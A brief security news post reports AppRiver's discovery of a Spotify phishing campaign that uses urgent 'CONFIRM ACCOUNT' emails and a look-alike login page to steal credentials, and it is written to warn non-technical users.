The phishing campaign was discovered earlier November, attackers used convincing emails to trick Spotify users into providing their account credentials.

The messages include a link that points to phishing websites that prompt users into entering their username and password. Attackers use them to compromise the Spotify accounts and any other account on other services that share the same credentials.

“Recently, AppRiver detected a phishing campaign that was targeting Spotify customers by email with the purpose of hijacking the owner’s account.” reads the analysis published AppRiver.

“The attacker attempted to dupe users into clicking on a phishing link that would redirect them to a deceptive website. Once at the site, users were prompted to enter their user name and password (surprise!), giving the attacker the ability to hijack the account.”

spotify phishing campaign

Attackers set up a login page that looks identical to the actual Spotify login page, but with an URL that isn’t the legitimate one.

Experts also pointed out that the “From Address domain is not the official Spotify one.

The attacker trick victims into clicking on a green button with the words “CONFIRM ACCOUNT.” The messages pose themselves as urgent communication about account restrictions that could be removed with an action of the users.

Clicking on the button, users are redirected to a phishing page.

Sincerely speaking, this specific campaign is not complex and could be easily spotted by most of the users.

The post published by the experts has just one goal, share information about a campaign that could deceive non-tech-savvy users, for this reason, I decided to speak about the Spotify campaign too.

Pierluigi Paganini

(Security Affairs – Spotify phishing campaign, cybercrime)

The post Very trivial Spotify phishing campaign uncovered by experts appeared first on Security Affairs.